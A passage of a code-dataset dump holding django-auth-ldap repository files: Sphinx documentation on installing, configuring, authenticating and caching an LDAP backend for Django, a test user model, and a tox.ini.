https://pypi.org/project/python-ldap/\n\n\nLicense\n=======\n\n.. include:: ../LICENSE\n" }, { "alpha_fraction": 0.7498518228530884, "alphanum_fraction": 0.7498518228530884, "avg_line_length": 53.41935348510742, "blob_id": "20e0339fc833244b83c76af65bd3bde898ff0ceb", "content_id": "2a1d99bacc10394d28da1f946668fc5bac8fba07", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1687, "license_type": "permissive", "max_line_length": 80, "num_lines": 31, "path": "/docs/performance.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Performance\n===========\n\n:class:`~django_auth_ldap.backend.LDAPBackend` is carefully designed not to\nrequire a connection to the LDAP service for every request. Of course, this\ndepends heavily on how it is configured. If LDAP traffic or latency is a concern\nfor your deployment, this section has a few tips on minimizing it, in decreasing\norder of impact.\n\n#. **Cache groups**. If :setting:`AUTH_LDAP_FIND_GROUP_PERMS` is ``True``, the\n default behavior is to reload a user's group memberships on every request.\n This is the safest behavior, as any membership change takes effect\n immediately, but it is expensive. If possible, set\n :setting:`AUTH_LDAP_CACHE_TIMEOUT` to remove most of this traffic.\n\n#. **Don't access user.ldap_user.***. Except for ``ldap_user.dn``, these\n properties are only cached on a per-request basis. If you can propagate LDAP\n attributes to a :class:`~django.contrib.auth.models.User`, they will only be\n updated at login. ``user.ldap_user.attrs`` triggers an LDAP connection for\n every request in which it's accessed.\n\n#. **Use simpler group types**. Some grouping mechanisms are more expensive than\n others. This will often be outside your control, but it's important to note\n that the extra functionality of more complex group types like\n :class:`~django_auth_ldap.config.NestedGroupOfNamesType` is not free and will\n generally require a greater number and complexity of LDAP queries.\n\n#. **Use direct binding**. Binding with :setting:`AUTH_LDAP_USER_DN_TEMPLATE` is\n a little bit more efficient than relying on :setting:`AUTH_LDAP_USER_SEARCH`.\n Specifically, it saves two LDAP operations (one bind and one search) per\n login.\n" }, { "alpha_fraction": 0.7165305018424988, "alphanum_fraction": 0.7177875638008118, "avg_line_length": 32.8510627746582, "blob_id": "9ea8dc2b64100df062963f290cb0c96d0afa70aa", "content_id": "46169ce0d4db0823b011400a73c3880e7a6d4014", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1591, "license_type": "permissive", "max_line_length": 78, "num_lines": 47, "path": "/docs/install.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Installation\n============\n\nInstall the package with pip:\n\n.. code-block:: sh\n\n $ pip install django-auth-ldap\n\nIt requires `python-ldap`_ >= 3.0. You'll need the `OpenLDAP`_ libraries and\nheaders available on your system.\n\nTo use the auth backend in a Django project, add\n``'django_auth_ldap.backend.LDAPBackend'`` to\n:setting:`AUTHENTICATION_BACKENDS`. Do not add anything to\n:setting:`INSTALLED_APPS`.\n\n.. code-block:: python\n\n AUTHENTICATION_BACKENDS = [\"django_auth_ldap.backend.LDAPBackend\"]\n\n:class:`~django_auth_ldap.backend.LDAPBackend` should work with custom user\nmodels, but it does assume that a database is present.\n\n.. note::\n\n :class:`~django_auth_ldap.backend.LDAPBackend` does not inherit from\n :class:`~django.contrib.auth.backends.ModelBackend`. It is possible to use\n :class:`~django_auth_ldap.backend.LDAPBackend` exclusively by configuring\n it to draw group membership from the LDAP server. However, if you would\n like to assign permissions to individual users or add users to groups\n within Django, you'll need to have both backends installed:\n\n .. code-block:: python\n\n AUTHENTICATION_BACKENDS = [\n \"django_auth_ldap.backend.LDAPBackend\",\n \"django.contrib.auth.backends.ModelBackend\",\n ]\n\n Django will check each authentication backend in order, so you are free to\n reorder these if checking\n :class:`~django.contrib.auth.backends.ModelBackend` first is more\n applicable to your application.\n\n.. _`python-ldap`: https://pypi.org/project/python-ldap/\n.. _`OpenLDAP`: https://www.openldap.org/\n" }, { "alpha_fraction": 0.7498474717140198, "alphanum_fraction": 0.75, "avg_line_length": 44.52777862548828, "blob_id": "3c29236ec7ad165be32617fec06091d89e4d59dc", "content_id": "e56eb704b7536a88af4badd71e4a7b519455f664", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 6560, "license_type": "permissive", "max_line_length": 80, "num_lines": 144, "path": "/docs/users.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "User objects\n============\n\nAuthenticating against an external source is swell, but Django's auth module is\ntightly bound to a user model. When a user logs in, we have to create a model\nobject to represent them in the database. Because the LDAP search is\ncase-insensitive, the default implementation also searches for existing Django\nusers with an iexact query and new users are created with lowercase usernames.\nSee :meth:`~django_auth_ldap.backend.LDAPBackend.get_or_build_user` if you'd\nlike to override this behavior. See\n:meth:`~django_auth_ldap.backend.LDAPBackend.get_user_model` if you'd like to\nsubstitute a proxy model.\n\nBy default, lookups on existing users are done using the user model's\n:attr:`~django.contrib.auth.models.CustomUser.USERNAME_FIELD`. To lookup by a\ndifferent field, use :setting:`AUTH_LDAP_USER_QUERY_FIELD`. When set, the\nusername field is ignored.\n\nWhen using the default for lookups, the only required field for a user is the\nusername. The default :class:`~django.contrib.auth.models.User` model can be\npicky about the characters allowed in usernames, so\n:class:`~django_auth_ldap.backend.LDAPBackend` includes a pair of hooks,\n:meth:`~django_auth_ldap.backend.LDAPBackend.ldap_to_django_username` and\n:meth:`~django_auth_ldap.backend.LDAPBackend.django_to_ldap_username`, to\ntranslate between LDAP usernames and Django usernames. You may need this, for\nexample, if your LDAP names have periods in them. You can subclass\n:class:`~django_auth_ldap.backend.LDAPBackend` to implement these hooks; by\ndefault the username is not modified. :class:`~django.contrib.auth.models.User`\nobjects that are authenticated by\n:class:`~django_auth_ldap.backend.LDAPBackend` will have an ``ldap_username``\nattribute with the original (LDAP) username.\n:attr:`~django.contrib.auth.models.User.username` (or\n:meth:`~django.contrib.auth.models.AbstractBaseUser.get_username`) will, of\ncourse, be the Django username.\n\n.. note::\n\n Users created by :class:`~django_auth_ldap.backend.LDAPBackend` will have an\n unusable password set. This will only happen when the user is created, so if\n you set a valid password in Django, the user will be able to log in through\n :class:`~django.contrib.auth.backends.ModelBackend` (if configured) even if\n they are rejected by LDAP. This is not generally recommended, but could be\n useful as a fail-safe for selected users in case the LDAP server is\n unavailable.\n\n\nPopulating Users\n----------------\n\nYou can perform arbitrary population of your user models by adding listeners to\nthe :mod:`Django signal <django:django.dispatch>`:\n:data:`django_auth_ldap.backend.populate_user`. This signal is sent after the\nuser object has been constructed (but not necessarily saved) and any configured\nattribute mapping has been applied (see below). You can use this to propagate\ninformation from the LDAP directory to the user object any way you like. If you\nneed the user object to exist in the database at this point, you can save it in\nyour signal handler or override\n:meth:`~django_auth_ldap.backend.LDAPBackend.get_or_build_user`. In either case,\nthe user instance will be saved automatically after the signal handlers are run.\n\nIf you need an attribute that isn't included by default in the LDAP search\nresults, see :setting:`AUTH_LDAP_USER_ATTRLIST`.\n\n\nEasy Attributes\n---------------\n\nIf you just want to copy a few attribute values directly from the user's LDAP\ndirectory entry to their Django user, the setting,\n:setting:`AUTH_LDAP_USER_ATTR_MAP`, makes it easy. This is a dictionary that\nmaps user model keys, respectively, to (case-insensitive) LDAP attribute\nnames:\n\n.. code-block:: python\n\n AUTH_LDAP_USER_ATTR_MAP = {\"first_name\": \"givenName\", \"last_name\": \"sn\"}\n\nOnly string fields can be mapped to attributes. Boolean fields can be defined by\ngroup membership:\n\n.. code-block:: python\n\n AUTH_LDAP_USER_FLAGS_BY_GROUP = {\n \"is_active\": \"cn=active,ou=groups,dc=example,dc=com\",\n \"is_staff\": (\n LDAPGroupQuery(\"cn=staff,ou=groups,dc=example,dc=com\")\n | LDAPGroupQuery(\"cn=admin,ou=groups,dc=example,dc=com\")\n ),\n \"is_superuser\": \"cn=superuser,ou=groups,dc=example,dc=com\",\n }\n\nValues in this dictionary may be simple DNs (as strings), lists or tuples of\nDNs, or :class:`~django_auth_ldap.config.LDAPGroupQuery` instances. Lists are\nconverted to queries joined by ``|``.\n\nRemember that if these settings don't do quite what you want, you can always use\nthe signals described in the previous section to implement your own logic.\n\n\nUpdating Users\n--------------\n\nBy default, all mapped user fields will be updated each time the user logs in.\nTo disable this, set :setting:`AUTH_LDAP_ALWAYS_UPDATE_USER` to ``False``. If\nyou need to populate a user outside of the authentication process—for example,\nto create associated model objects before the user logs in for the first\ntime—you can call :meth:`django_auth_ldap.backend.LDAPBackend.populate_user`.\nYou'll need an instance of :class:`~django_auth_ldap.backend.LDAPBackend`, which\nyou should feel free to create yourself.\n:meth:`~django_auth_ldap.backend.LDAPBackend.populate_user` returns the\n:class:`~django.contrib.auth.models.User` or `None` if the user could not be\nfound in LDAP.\n\n.. code-block:: python\n\n from django_auth_ldap.backend import LDAPBackend\n\n user = LDAPBackend().populate_user(\"alice\")\n if user is None:\n raise Exception(\"No user named alice\")\n\n\n.. _ldap_user:\n\nDirect Attribute Access\n-----------------------\n\nIf you need to access multi-value attributes or there is some other reason that\nthe above is inadequate, you can also access the user's raw LDAP attributes.\n``user.ldap_user`` is an object with four public properties. The group\nproperties are, of course, only valid if groups are configured.\n\n * ``dn``: The user's distinguished name.\n * ``attrs``: The user's LDAP attributes as a dictionary of lists of string\n values. The dictionaries are modified to use case-insensitive keys.\n * ``group_dns``: The set of groups that this user belongs to, as DNs.\n * ``group_names``: The set of groups that this user belongs to, as simple\n names. These are the names that will be used if\n :setting:`AUTH_LDAP_MIRROR_GROUPS` is used.\n\nPython-ldap returns all attribute values as utf8-encoded strings. For\nconvenience, this module will try to decode all values into Unicode strings. Any\nstring that can not be successfully decoded will be left as-is; this may apply\nto binary values such as Active Directory's objectSid.\n" }, { "alpha_fraction": 0.6833046674728394, "alphanum_fraction": 0.6867470145225525, "avg_line_length": 24.2608699798584, "blob_id": "f9f060333ee79315cc26d52f663b4fe825b8c04e", "content_id": "61e8351022a302ceabb66f7a720fd5c6c13d483d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "permissive", "max_line_length": 76, "num_lines": 23, "path": "/tests/models.py", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "from django.contrib.auth.models import AbstractBaseUser\nfrom django.db import models\n\n\nclass TestUser(AbstractBaseUser):\n identifier = models.CharField(max_length=40, unique=True, db_index=True)\n uid_number = models.IntegerField()\n\n USERNAME_FIELD = \"identifier\"\n\n def get_full_name(self):\n return self.identifier\n\n def get_short_name(self):\n return self.identifier\n\n def get_first_name(self):\n return \"Alice\"\n\n def set_first_name(self, value):\n raise Exception(\"Oops...\")\n\n first_name = property(get_first_name, set_first_name)\n" }, { "alpha_fraction": 0.6651017069816589, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 36.588233947753906, "blob_id": "c0cb2dbfa94ca64d6fea75e7fc32b6df3caef5c9", "content_id": "2bfdc86da2bb59e3884026c710b89828c26ec6c4", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 639, "license_type": "permissive", "max_line_length": 85, "num_lines": 17, "path": "/docs/logging.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Logging\n=======\n\n:class:`~django_auth_ldap.backend.LDAPBackend` uses the standard Python\n:mod:`logging` module to log debug and warning messages to the logger named\n``'django_auth_ldap'``. If you need debug messages to help with configuration\nissues, you should add a handler to this logger. Using Django's\n:setting:`LOGGING` setting, you can add an entry to your config.\n\n.. code-block:: python\n\n LOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"handlers\": {\"console\": {\"class\": \"logging.StreamHandler\"}},\n \"loggers\": {\"django_auth_ldap\": {\"level\": \"DEBUG\", \"handlers\": [\"console\"]}},\n }\n" }, { "alpha_fraction": 0.7781726121902466, "alphanum_fraction": 0.779187798500061, "avg_line_length": 47.64197540283203, "blob_id": "d8c405f75783f3398b04e1526bc1e4d50272e16e", "content_id": "989a0acb350de2c0d34d075e807efaa6999135e3", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3940, "license_type": "permissive", "max_line_length": 80, "num_lines": 81, "path": "/docs/permissions.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Permissions\n===========\n\nGroups are useful for more than just populating the user's ``is_*`` fields.\n:class:`~django_auth_ldap.backend.LDAPBackend` would not be complete without\nsome way to turn a user's LDAP group memberships into Django model permissions.\nIn fact, there are two ways to do this.\n\nUltimately, both mechanisms need some way to map LDAP groups to Django groups.\nImplementations of :class:`~django_auth_ldap.config.LDAPGroupType` will have an\nalgorithm for deriving the Django group name from the LDAP group. Clients that\nneed to modify this behavior can subclass the\n:class:`~django_auth_ldap.config.LDAPGroupType` class. All of the built-in\nimplementations take a ``name_attr`` argument to ``__init__``, which\nspecifies the LDAP attribute from which to take the Django group name. By\ndefault, the ``cn`` attribute is used.\n\n\nUsing Groups Directly\n---------------------\n\nThe least invasive way to map group permissions is to set\n:setting:`AUTH_LDAP_FIND_GROUP_PERMS` to ``True``.\n:class:`~django_auth_ldap.backend.LDAPBackend` will then find all of the LDAP\ngroups that a user belongs to, map them to Django groups, and load the\npermissions for those groups. You will need to create the Django groups and\nassociate permissions yourself, generally through the admin interface.\n\nTo minimize traffic to the LDAP server,\n:class:`~django_auth_ldap.backend.LDAPBackend` can make use of Django's cache\nframework to keep a copy of a user's LDAP group memberships. To enable this\nfeature, set :setting:`AUTH_LDAP_CACHE_TIMEOUT`, which determines the timeout\nof cache entries in seconds.\n\n.. code-block:: python\n\n AUTH_LDAP_CACHE_TIMEOUT = 3600\n\n\nGroup Mirroring\n---------------\n\nThe second way to turn LDAP group memberships into permissions is to mirror the\ngroups themselves. This approach has some important disadvantages and should be\navoided if possible. For one thing, membership will only be updated when the\nuser authenticates, which may be especially inappropriate for sites with long\nsession timeouts.\n\nIf :setting:`AUTH_LDAP_MIRROR_GROUPS` is ``True``, then every time a user logs\nin, :class:`~django_auth_ldap.backend.LDAPBackend` will update the database with\nthe user's LDAP groups. Any group that doesn't exist will be created and the\nuser's Django group membership will be updated to exactly match their LDAP group\nmembership. If the LDAP server has nested groups, the Django database will end\nup with a flattened representation. For group mirroring to have any effect, you\nof course need :class:`~django.contrib.auth.backends.ModelBackend` installed as\nan authentication backend.\n\nBy default, we assume that LDAP is the sole authority on group membership; if\nyou remove a user from a group in LDAP, they will be removed from the\ncorresponding Django group the next time they log in. It is also possible to\nhave django-auth-ldap ignore some Django groups, presumably because they are\nmanaged manually or through some other mechanism. If\n:setting:`AUTH_LDAP_MIRROR_GROUPS` is a list of group names, we will manage\nthese groups and no others. If :setting:`AUTH_LDAP_MIRROR_GROUPS_EXCEPT` is a\nlist of group names, we will manage all groups except those named;\n:setting:`AUTH_LDAP_MIRROR_GROUPS` is ignored in this case.\n\n\nNon-LDAP Users\n--------------\n\n:class:`~django_auth_ldap.backend.LDAPBackend` has one more feature pertaining\nto permissions, which is the ability to handle authorization for users that it\ndid not authenticate. For example, you might be using\n:class:`~django.contrib.auth.backends.RemoteUserBackend`\nto map externally authenticated users to Django users. By setting\n:setting:`AUTH_LDAP_AUTHORIZE_ALL_USERS`,\n:class:`~django_auth_ldap.backend.LDAPBackend` will map these users to LDAP\nusers in the normal way in order to provide authorization information. Note that\nthis does *not* work with :setting:`AUTH_LDAP_MIRROR_GROUPS`; group mirroring is\na feature of authentication, not authorization.\n" }, { "alpha_fraction": 0.6348167657852173, "alphanum_fraction": 0.6753926873207092, "avg_line_length": 16.76744270324707, "blob_id": "f834f610f82602ba54d3dad3e83bcd57af6b2cd6", "content_id": "5040692272ce6056b520a3ba8a19bb4f8c25d1c1", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 764, "license_type": "permissive", "max_line_length": 70, "num_lines": 43, "path": "/tox.ini", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "[tox]\nenvlist =\n black\n flake8\n isort\n docs\n django32\n django41\n django42\n djangomain\nisolated_build = true\n\n[testenv]\ncommands = {envpython} -Wa -b -m django test --settings tests.settings\ndeps =\n django32: Django>=3.2,<4.0\n django41: Django>=4.1,<4.2\n django42: Django>=4.2,<4.3\n djangomain: https://github.com/django/django/archive/main.tar.gz\n\n[testenv:black]\ndeps = black\ncommands = black --check --diff .\nskip_install = true\n\n[testenv:flake8]\ndeps = flake8\ncommands = flake8\nskip_install = true\n\n[testenv:isort]\ndeps = isort>=5.0.1\ncommands = isort --check --diff .\nskip_install = true\n\n[testenv:docs]\nisolated_build = true\ndeps =\n readme_renderer\n sphinx\ncommands =\n make -C docs html\nallowlist_externals = make\n" }, { "alpha_fraction": 0.7271167039871216, "alphanum_fraction": 0.7351258397102356, "avg_line_length": 33.959999084472656, "blob_id": "694ecefdc4868370e0635346b2d3e50853f75724", "content_id": "e4bdfeb7cbdfbea3347524f59ec7e93c2c18265b", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1748, "license_type": "permissive", "max_line_length": 92, "num_lines": 50, "path": "/docs/multiconfig.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Multiple LDAP Configs\n=====================\n\n.. versionadded:: 1.1\n\nYou've probably noticed that all of the settings for this backend have the\nprefix AUTH_LDAP\\_. This is the default, but it can be customized by subclasses\nof :class:`~django_auth_ldap.backend.LDAPBackend`. The main reason you would\nwant to do this is to create two backend subclasses that reference different\ncollections of settings and thus operate independently. For example, you might\nhave two separate LDAP servers that you want to authenticate against. A short\nexample should demonstrate this:\n\n.. code-block:: python\n\n # mypackage.ldap\n\n from django_auth_ldap.backend import LDAPBackend\n\n\n class LDAPBackend1(LDAPBackend):\n settings_prefix = \"AUTH_LDAP_1_\"\n\n\n class LDAPBackend2(LDAPBackend):\n settings_prefix = \"AUTH_LDAP_2_\"\n\n\n.. code-block:: python\n\n # settings.py\n\n AUTH_LDAP_1_SERVER_URI = \"ldap://ldap1.example.com\"\n AUTH_LDAP_1_USER_DN_TEMPLATE = \"uid=%(user)s,ou=users,dc=example,dc=com\"\n\n AUTH_LDAP_2_SERVER_URI = \"ldap://ldap2.example.com\"\n AUTH_LDAP_2_USER_DN_TEMPLATE = \"uid=%(user)s,ou=users,dc=example,dc=com\"\n\n AUTHENTICATION_BACKENDS = (\"mypackage.ldap.LDAPBackend1\", \"mypackage.ldap.LDAPBackend2\")\n\nAll of the usual rules apply: Django will attempt to authenticate a user with\neach backend in turn until one of them succeeds. When a particular backend\nsuccessfully authenticates a user, that user will be linked to the backend for\nthe duration of their session.\n\n.. note::\n\n Due to its global nature, :setting:`AUTH_LDAP_GLOBAL_OPTIONS` ignores the\n settings prefix. Regardless of how many backends are installed, this setting\n is referenced once by its default name at the time we load the ldap module.\n" }, { "alpha_fraction": 0.6584834456443787, "alphanum_fraction": 0.6660067439079285, "avg_line_length": 32.67333221435547, "blob_id": "629a0d6e7e6a7a68ec4a937c31b21562d22102a9", "content_id": "daa30a4f7bb8ff97fb67702ba5582ca8a2041a38", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5051, "license_type": "permissive", "max_line_length": 87, "num_lines": 150, "path": "/docs/custombehavior.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Custom Behavior\n===============\n\nThere are times that the default :class:`~django_auth_ldap.backend.LDAPBackend`\nbehavior may be insufficient for your needs. In those cases, you can further \ncustomize the behavior by following these general steps:\n\n\n* Create your own :class:`~django_auth_ldap.backend.LDAPBackend` subclass.\n* Use :attr:`~django_auth_ldap.backend.LDAPBackend.default_settings` to define\n any custom settings you may want to use.\n* Override :meth:`~django_auth_ldap.backend.LDAPBackend.authenticate_ldap_user` \n hook and/or any other method as needed.\n* Define additional methods and attributes as needed.\n* Access your custom settings via ``self.settings`` inside your \n :class:`~django_auth_ldap.backend.LDAPBackend` subclass.\n\n\nSubclassing LDAPBackend\n-----------------------\n\nYou can implement your own :class:`~django_auth_ldap.backend.LDAPBackend` subclass\nif you need some custom behavior. For example, you want to only allow 50 login \nattempts every 30 minutes, and those numbers may change as needed. Furthermore, \nany successful login attempt against the LDAP server must send out an SMS \nnotification, but there should be an option to limit this behavior to a \nspecific set of usernames based on a regex. One can accomplish that by doing \nsomething like this:\n\n.. code-block:: python\n\n # mypackage.ldap\n\n import re\n\n from django.core.cache import cache\n\n from django_auth_ldap.backend import LDAPBackend\n\n\n class CustomLDAPBackend(LDAPBackend):\n default_settings = {\n \"LOGIN_COUNTER_KEY\": \"CUSTOM_LDAP_LOGIN_ATTEMPT_COUNT\",\n \"LOGIN_ATTEMPT_LIMIT\": 50,\n \"RESET_TIME\": 30 * 60,\n \"USERNAME_REGEX\": r\"^.*$\",\n }\n\n def authenticate_ldap_user(self, ldap_user, password):\n if self.exceeded_login_attempt_limit():\n # Or you can raise a 403 if you do not want\n # to continue checking other auth backends\n print(\"Login attempts exceeded.\")\n return None\n self.increment_login_attempt_count()\n user = ldap_user.authenticate(password)\n if user and self.username_matches_regex(user.username):\n self.send_sms(user.username)\n return user\n\n @property\n def login_attempt_count(self):\n return cache.get_or_set(\n self.settings.LOGIN_COUNTER_KEY, 0, self.settings.RESET_TIME\n )\n\n def increment_login_attempt_count(self):\n try:\n cache.incr(self.settings.LOGIN_COUNTER_KEY)\n except ValueError:\n cache.set(self.settings.LOGIN_COUNTER_KEY, 1, self.settings.RESET_TIME)\n\n def exceeded_login_attempt_limit(self):\n return self.login_attempt_count >= self.settings.LOGIN_ATTEMPT_LIMIT\n\n def username_matches_regex(self, username):\n return re.match(self.settings.USERNAME_REGEX, username)\n\n def send_sms(self, username):\n # Implement your SMS logic here\n print(\"SMS sent!\")\n\n\n\n.. code-block:: python\n\n # settings.py\n\n AUTHENTICATION_BACKENDS = [\n # ...\n \"mypackage.ldap.CustomLDAPBackend\",\n # ...\n ]\n\n\nUsing default_settings\n----------------------\n\nWhile you can use your own custom Django settings to create something similar \nto the sample code above, there are a couple of advantages in using \n:attr:`~django_auth_ldap.backend.LDAPBackend.default_settings` instead. \n\nFollowing the sample code above, one advantage is that the subclass will now \nautomatically check your Django settings for ``AUTH_LDAP_LOGIN_COUNTER_KEY``, \n``AUTH_LDAP_LOGIN_ATTEMPT_LIMIT``, ``AUTH_LDAP_RESET_TIME``, and \n``AUTH_LDAP_USERNAME_REGEX``. Another advantage is that for each setting not \nexplicitly defined in your Django settings, the subclass will then use the \ncorresponding default values. This behavior will be very handy in case you \nwill need to override certain settings. \n\n\nOverriding default_settings\n---------------------------\n\nIf down the line, you want to increase the login attempt limit to 100 every \n15 minutes, and you only want SMS notifications for usernames with a \"zz\\_\" \nprefix, then you can simply modify your settings.py like so.\n\n.. code-block:: python\n\n # settings.py\n\n AUTH_LDAP_LOGIN_ATTEMPT_LIMIT = 100\n AUTH_LDAP_RESET_TIME = 15 * 60\n AUTH_LDAP_USERNAME_REGEX = r\"^zz_.*$\"\n\n AUTHENTICATION_BACKENDS = [\n # ...\n \"mypackage.ldap.CustomLDAPBackend\",\n # ...\n ]\n\nIf the :attr:`~django_auth_ldap.backend.LDAPBackend.settings_prefix` of the\nsubclass was also changed, then the prefix must also be used in your settings. \nFor example, if the prefix was changed to \"AUTH_LDAP_1\\_\", then it should look \nlike this.\n\n.. code-block:: python\n\n # settings.py\n\n AUTH_LDAP_1_LOGIN_ATTEMPT_LIMIT = 100\n AUTH_LDAP_1_RESET_TIME = 15 * 60\n AUTH_LDAP_1_USERNAME_REGEX = r\"^zz_.*$\"\n\n AUTHENTICATION_BACKENDS = [\n # ...\n \"mypackage.ldap.CustomLDAPBackend\",\n # ...\n ]\n" }, { "alpha_fraction": 0.7587857246398926, "alphanum_fraction": 0.7598796486854553, "avg_line_length": 39.403316497802734, "blob_id": "ffcab043e90be3a12304c75b82742cdf1e8c9b0f", "content_id": "c5c4e57cefa8042d4797d45d14c11960d716ae2a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 7313, "license_type": "permissive", "max_line_length": 92, "num_lines": 181, "path": "/docs/authentication.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Authentication\n==============\n\nServer Config\n-------------\n\nIf your LDAP server isn't running locally on the default port, you'll want to\nstart by setting :setting:`AUTH_LDAP_SERVER_URI` to point to your server. The\nvalue of this setting can be anything that your LDAP library supports. For\ninstance, openldap may allow you to give a comma- or space-separated list of\nURIs to try in sequence.\n\n.. code-block:: python\n\n AUTH_LDAP_SERVER_URI = \"ldap://ldap.example.com\"\n\nIf your server location is even more dynamic than this, you may provide a\nfunction (or any callable object) that returns the URI. The callable is passed\na single positional argument: ``request``. You should assume that this will be\ncalled on every request, so if it's an expensive operation, some caching is in\norder.\n\n.. code-block:: python\n\n from my_module import find_my_ldap_server\n\n AUTH_LDAP_SERVER_URI = find_my_ldap_server\n\nIf you need to configure any python-ldap options, you can set\n:setting:`AUTH_LDAP_GLOBAL_OPTIONS` and/or\n:setting:`AUTH_LDAP_CONNECTION_OPTIONS`. For example, disabling referrals is not\nuncommon:\n\n.. code-block:: python\n\n import ldap\n\n AUTH_LDAP_CONNECTION_OPTIONS = {ldap.OPT_REFERRALS: 0}\n\n.. versionchanged:: 1.7.0\n\n When ``AUTH_LDAP_SERVER_URI`` is set to a callable, it is now passed a\n positional ``request`` argument. Support for no arguments will continue for\n backwards compatibility but will be removed in a future version.\n\n\nSearch/Bind\n-----------\n\nNow that you can talk to your LDAP server, the next step is to authenticate a\nusername and password. There are two ways to do this, called search/bind and\ndirect bind. The first one involves connecting to the LDAP server either\nanonymously or with a fixed account and searching for the distinguished name of\nthe authenticating user. Then we can attempt to bind again with the user's\npassword. The second method is to derive the user's DN from his username and\nattempt to bind as the user directly.\n\nBecause LDAP searches appear elsewhere in the configuration, the\n:class:`~django_auth_ldap.config.LDAPSearch` class is provided to encapsulate\nsearch information. In this case, the filter parameter should contain the\nplaceholder ``%(user)s``. A simple configuration for the search/bind approach\nlooks like this (some defaults included for completeness):\n\n.. code-block:: python\n\n import ldap\n from django_auth_ldap.config import LDAPSearch\n\n AUTH_LDAP_BIND_DN = \"\"\n AUTH_LDAP_BIND_PASSWORD = \"\"\n AUTH_LDAP_USER_SEARCH = LDAPSearch(\n \"ou=users,dc=example,dc=com\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n\nThis will perform an anonymous bind, search under\n``\"ou=users,dc=example,dc=com\"`` for an object with a uid matching the user's\nname, and try to bind using that DN and the user's password. The search must\nreturn exactly one result or authentication will fail. If you can't search\nanonymously, you can set :setting:`AUTH_LDAP_BIND_DN` to the distinguished name\nof an authorized user and :setting:`AUTH_LDAP_BIND_PASSWORD` to the password.\n\nSearch Unions\n^^^^^^^^^^^^^\n\n.. versionadded:: 1.1\n\nIf you need to search in more than one place for a user, you can use\n:class:`~django_auth_ldap.config.LDAPSearchUnion`. This takes multiple\nLDAPSearch objects and returns the union of the results. The precedence of the\nunderlying searches is unspecified.\n\n.. code-block:: python\n\n import ldap\n from django_auth_ldap.config import LDAPSearch, LDAPSearchUnion\n\n AUTH_LDAP_USER_SEARCH = LDAPSearchUnion(\n LDAPSearch(\"ou=users,dc=example,dc=com\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"),\n LDAPSearch(\"ou=otherusers,dc=example,dc=com\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"),\n )\n\n\nDirect Bind\n-----------\n\nTo skip the search phase, set :setting:`AUTH_LDAP_USER_DN_TEMPLATE` to a\ntemplate that will produce the authenticating user's DN directly. This template\nshould have one placeholder, ``%(user)s``. If the first example had used\n``ldap.SCOPE_ONELEVEL``, the following would be a more straightforward (and\nefficient) equivalent:\n\n.. code-block:: python\n\n AUTH_LDAP_USER_DN_TEMPLATE = \"uid=%(user)s,ou=users,dc=example,dc=com\"\n\n\n.. _customizing-authentication:\n\nCustomizing Authentication\n--------------------------\n\n.. versionadded:: 1.3\n\nIt is possible to further customize the authentication process by subclassing\n:class:`~django_auth_ldap.backend.LDAPBackend` and overriding\n:meth:`~django_auth_ldap.backend.LDAPBackend.authenticate_ldap_user`. The first\nargument is the unauthenticated :ref:`ldap_user <ldap_user>`, the second is the\nsupplied password. The intent is to give subclasses a simple pre- and\npost-authentication hook.\n\nIf a subclass decides to proceed with the authentication, it must call the\ninherited implementation. It may then return either the authenticated user or\n``None``. The behavior of any other return value--such as substituting a\ndifferent user object--is undefined. :doc:`users` has more on managing Django\nuser objects.\n\nObviously, it is always safe to access ``ldap_user.dn`` before authenticating\nthe user. Accessing ``ldap_user.attrs`` and others should be safe unless you're\nrelying on special binding behavior, such as\n:setting:`AUTH_LDAP_BIND_AS_AUTHENTICATING_USER`.\n\nNotes\n-----\n\nLDAP is fairly flexible when it comes to matching DNs.\n:class:`~django_auth_ldap.backend.LDAPBackend` makes an effort to accommodate\nthis by forcing usernames to lower case when creating Django users and trimming\nwhitespace when authenticating.\n\nSome LDAP servers are configured to allow users to bind without a password. As a\nprecaution against false positives,\n:class:`~django_auth_ldap.backend.LDAPBackend` will summarily reject any\nauthentication attempt with an empty password. You can disable this behavior by\nsetting :setting:`AUTH_LDAP_PERMIT_EMPTY_PASSWORD` to True.\n\nBy default, all LDAP operations are performed with the\n:setting:`AUTH_LDAP_BIND_DN` and :setting:`AUTH_LDAP_BIND_PASSWORD` credentials,\nnot with the user's. Otherwise, the 